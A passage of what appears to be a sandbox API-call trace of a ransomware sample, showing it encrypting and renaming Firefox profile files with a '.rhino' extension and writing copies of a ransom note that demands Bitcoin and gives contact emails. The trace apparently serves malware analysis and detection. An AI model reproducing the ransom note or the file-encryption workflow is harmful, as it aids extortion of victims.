lpMem=0x75f0b8 | out: hHeap=0x6d0000) returned 1 [0092.303] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\crash reports\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0092.400] lstrlenA (lpString="All your files have been encrypted due to a security problem with your PC. If you want to restore them, write us to the e-mail:\n1)generalchin@countermail.com\n2)generalchin@smime.ninja (if you do not receive a response from the first mailbox)\n\nYou have to pay for decryption in Bitcoins. The price depends on how fast you write to us.\nAfter payment we will send you the decryption tool that will decrypt all your files.\n\nFree decryption as guarantee\nBefore paying you can send us up to 1 files for free decryption.\nThe total size of files must be less than 500 Kb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.)\n") returned 676 [0092.400] WriteFile (in: hFile=0x104, lpBuffer=0xcb9dd0*, nNumberOfBytesToWrite=0x2a4, lpNumberOfBytesWritten=0x2cfa5c, lpOverlapped=0x0 | out: lpBuffer=0xcb9dd0*, lpNumberOfBytesWritten=0x2cfa5c*=0x2a4, lpOverlapped=0x0) returned 1 [0092.402] CloseHandle (hObject=0x104) returned 1 [0092.402] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f160 | out: hHeap=0x6d0000) returned 1 [0092.402] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\addons.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\addons.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0092.476] GetFileSize (in: hFile=0xec, lpFileSizeHigh=0x2cfa64 | out: lpFileSizeHigh=0x2cfa64*=0x0) returned 0x18 [0092.476] LockFile (hFile=0xec, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x138, nNumberOfBytesToLockHigh=0x0) returned 1 [0092.476] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.477] ReadFile (in: hFile=0xec, lpBuffer=0x9b0040, nNumberOfBytesToRead=0x18, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0x18, lpOverlapped=0x0) returned 1 [0092.479] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0092.479] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0092.479] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72aff8 [0092.479] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7438 [0092.479] GetLastError () returned 0x0 [0092.479] SetLastError (dwErrCode=0x0) [0092.480] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0092.480] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x18) returned 0x709e68 [0092.480] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0092.480] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x75f0b8 [0092.480] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x75f1c0 [0092.480] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f0b8 | out: hHeap=0x6d0000) returned 1 [0092.480] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.480] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b7f8 [0092.480] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b818 [0092.480] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0092.480] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b7f8 [0092.480] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b818 | out: hHeap=0x6d0000) returned 1 [0092.480] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b818 [0092.480] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0092.480] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72b7f8 [0092.480] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b818 | out: hHeap=0x6d0000) returned 1 [0092.480] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x6df110 [0092.481] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0092.481] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x6df0f8 [0092.481] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df110 | out: hHeap=0x6d0000) returned 1 [0092.481] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709ec8 [0092.481] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df0f8 | out: hHeap=0x6d0000) returned 1 [0092.481] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6e8980 [0092.481] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709ec8 | out: hHeap=0x6d0000) returned 1 [0092.481] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x138) returned 0x75f348 [0092.481] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8980 | out: hHeap=0x6d0000) returned 1 [0092.481] WriteFile (in: hFile=0xec, lpBuffer=0x75f348*, nNumberOfBytesToWrite=0x138, lpNumberOfBytesWritten=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x75f348*, lpNumberOfBytesWritten=0x2cfa04*=0x138, lpOverlapped=0x0) returned 1 [0092.481] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f348 | out: hHeap=0x6d0000) returned 1 [0092.481] UnlockFile (hFile=0xec, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x138, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0092.482] CloseHandle (hObject=0xec) returned 1 [0092.483] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd0) returned 0x75d698 [0092.483] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x136) returned 0x75f348 [0092.483] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75d698 | out: hHeap=0x6d0000) returned 1 [0092.483] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\addons.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\addons.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\addons.json.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\addons.json.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0092.484] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f348 | out: hHeap=0x6d0000) returned 1 [0092.484] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f1c0 | out: hHeap=0x6d0000) returned 1 [0092.484] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709e68 | out: hHeap=0x6d0000) returned 1 [0092.484] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xb0) returned 0x6e9870 [0092.484] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f010 | out: hHeap=0x6d0000) returned 1 [0092.485] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xb0) returned 0x6e97b8 [0092.485] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x106) returned 0x75ef78 [0092.485] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e97b8 | out: hHeap=0x6d0000) returned 1 [0092.485] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0092.485] lstrlenA (lpString="All your files have been encrypted due to a security problem with your PC. If you want to restore them, write us to the e-mail:\n1)generalchin@countermail.com\n2)generalchin@smime.ninja (if you do not receive a response from the first mailbox)\n\nYou have to pay for decryption in Bitcoins. The price depends on how fast you write to us.\nAfter payment we will send you the decryption tool that will decrypt all your files.\n\nFree decryption as guarantee\nBefore paying you can send us up to 1 files for free decryption.\nThe total size of files must be less than 500 Kb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.)\n") returned 676 [0092.485] WriteFile (in: hFile=0xec, lpBuffer=0xcb9dd0*, nNumberOfBytesToWrite=0x2a4, lpNumberOfBytesWritten=0x2cfa5c, lpOverlapped=0x0 | out: lpBuffer=0xcb9dd0*, lpNumberOfBytesWritten=0x2cfa5c*=0x2a4, lpOverlapped=0x0) returned 1 [0092.487] CloseHandle (hObject=0xec) returned 1 [0092.488] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0092.488] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-05_5.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-05_5.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0092.671] GetFileSize (in: hFile=0xec, lpFileSizeHigh=0x2cfa64 | out: lpFileSizeHigh=0x2cfa64*=0x0) returned 0xbdb [0092.671] LockFile (hFile=0xec, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0xcfb, nNumberOfBytesToLockHigh=0x0) returned 1 [0092.672] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.672] ReadFile (in: hFile=0xec, lpBuffer=0x2cfa24, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x2cfa24*, lpNumberOfBytesRead=0x2cfa04*=0x20, lpOverlapped=0x0) returned 1 [0092.675] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.675] ReadFile (in: hFile=0xec, lpBuffer=0x9b0040, nNumberOfBytesToRead=0xbdb, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0xbdb, lpOverlapped=0x0) returned 1 [0092.675] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0092.676] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0092.676] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72aff8 [0092.676] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7438 [0092.676] GetLastError () returned 0x0 [0092.676] SetLastError (dwErrCode=0x0) [0092.676] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0092.676] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xbdb) returned 0x75ef78 [0092.676] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0092.676] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x75fb60 [0092.676] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x75fc68 [0092.676] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75fb60 | out: hHeap=0x6d0000) returned 1 [0092.676] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.676] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b7f8 [0092.676] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b818 [0092.676] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0092.676] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b7f8 [0092.676] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b818 | out: hHeap=0x6d0000) returned 1 [0092.677] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b818 [0092.677] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0092.677] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72b7f8 [0092.677] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b818 | out: hHeap=0x6d0000) returned 1 [0092.677] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x6df0f8 [0092.677] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0092.677] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x6df110 [0092.677] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df0f8 | out: hHeap=0x6d0000) returned 1 [0092.677] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709e68 [0092.677] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df110 | out: hHeap=0x6d0000) returned 1 [0092.677] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6e8980 [0092.677] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709e68 | out: hHeap=0x6d0000) returned 1 [0092.677] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x72aff8 [0092.677] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8980 | out: hHeap=0x6d0000) returned 1 [0092.677] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e7438 [0092.677] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0092.677] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x708d18 [0092.677] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0092.677] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x72a920 [0092.677] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0092.678] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x75fb60 [0092.678] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0092.678] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x75fdf0 [0092.678] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75fb60 | out: hHeap=0x6d0000) returned 1 [0092.678] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x75ff38 [0092.678] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75fdf0 | out: hHeap=0x6d0000) returned 1 [0092.678] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x760120 [0092.678] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ff38 | out: hHeap=0x6d0000) returned 1 [0092.678] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x7603f0 [0092.678] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x760120 | out: hHeap=0x6d0000) returned 1 [0092.678] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x760828 [0092.678] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7603f0 | out: hHeap=0x6d0000) returned 1 [0092.678] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x75fdf0 [0092.678] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x760828 | out: hHeap=0x6d0000) returned 1 [0092.678] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x760758 [0092.678] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75fdf0 | out: hHeap=0x6d0000) returned 1 [0092.678] WriteFile (in: hFile=0xec, lpBuffer=0x760758*, nNumberOfBytesToWrite=0xcfb, lpNumberOfBytesWritten=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x760758*, lpNumberOfBytesWritten=0x2cfa04*=0xcfb, lpOverlapped=0x0) returned 1 [0092.679] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x760758 | out: hHeap=0x6d0000) returned 1 [0092.679] UnlockFile (hFile=0xec, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0xcfb, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0092.679] CloseHandle (hObject=0xec) returned 1 [0092.680] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x110) returned 0x75fdf0 [0092.680] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x196) returned 0x75ff08 [0092.680] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75fdf0 | out: hHeap=0x6d0000) returned 1 [0092.680] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-05_5.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-05_5.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-05_5.json.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-05_5.json.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0092.681] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ff08 | out: hHeap=0x6d0000) returned 1 [0092.682] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75fc68 | out: hHeap=0x6d0000) returned 1 [0092.682] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0092.682] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd0) returned 0x75d698 [0092.682] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e9870 | out: hHeap=0x6d0000) returned 1 [0092.682] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd0) returned 0x75d770 [0092.682] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x136) returned 0x75ef78 [0092.682] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75d770 | out: hHeap=0x6d0000) returned 1 [0092.682] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\bookmarkbackups\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0092.903] lstrlenA (lpString="All your files have been encrypted due to a security problem with your PC. If you want to restore them, write us to the e-mail:\n1)generalchin@countermail.com\n2)generalchin@smime.ninja (if you do not receive a response from the first mailbox)\n\nYou have to pay for decryption in Bitcoins. The price depends on how fast you write to us.\nAfter payment we will send you the decryption tool that will decrypt all your files.\n\nFree decryption as guarantee\nBefore paying you can send us up to 1 files for free decryption.\nThe total size of files must be less than 500 Kb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.)\n") returned 676 [0092.903] WriteFile (in: hFile=0x104, lpBuffer=0xcb9dd0*, nNumberOfBytesToWrite=0x2a4, lpNumberOfBytesWritten=0x2cfa5c, lpOverlapped=0x0 | out: lpBuffer=0xcb9dd0*, lpNumberOfBytesWritten=0x2cfa5c*=0x2a4, lpOverlapped=0x0) returned 1 [0092.905] CloseHandle (hObject=0x104) returned 1 [0092.905] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0092.905] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-16_5.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-16_5.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0093.110] GetFileSize (in: hFile=0x104, lpFileSizeHigh=0x2cfa64 | out: lpFileSizeHigh=0x2cfa64*=0x0) returned 0xbdb [0093.110] LockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0xcfb, nNumberOfBytesToLockHigh=0x0) returned 1 [0093.110] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.110] ReadFile (in: hFile=0x104, lpBuffer=0x2cfa24, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x2cfa24*, lpNumberOfBytesRead=0x2cfa04*=0x20, lpOverlapped=0x0) returned 1 [0093.112] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.118] ReadFile (in: hFile=0x104, lpBuffer=0x9b0040, nNumberOfBytesToRead=0xbdb, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0xbdb, lpOverlapped=0x0) returned 1 [0093.118] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0093.119] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0093.119] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72aff8 [0093.119] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7438 [0093.119] GetLastError () returned 0x0 [0093.119] SetLastError (dwErrCode=0x0) [0093.119] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0093.119] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xbdb) returned 0x75ef78 [0093.119] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0093.119] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x75fb60 [0093.119] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x75fc68 [0093.119] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75fb60 | out: hHeap=0x6d0000) returned 1 [0093.119] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.119] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b7f8 [0093.119] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b818 [0093.119] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0093.119] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b7f8 [0093.119] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b818 | out: hHeap=0x6d0000) returned 1 [0093.119] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b818 [0093.119] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0093.119] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72b7f8 [0093.120] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b818 | out: hHeap=0x6d0000) returned 1 [0093.120] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x6df110 [0093.120] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0093.120] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x6df0f8 [0093.120] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df110 | out: hHeap=0x6d0000) returned 1 [0093.120] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709e68 [0093.120] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df0f8 | out: hHeap=0x6d0000) returned 1 [0093.120] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6e8980 [0093.120] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709e68 | out: hHeap=0x6d0000) returned 1 [0093.120] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x72aff8 [0093.120] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8980 | out: hHeap=0x6d0000) returned 1 [0093.120] RtlAllocateHeap 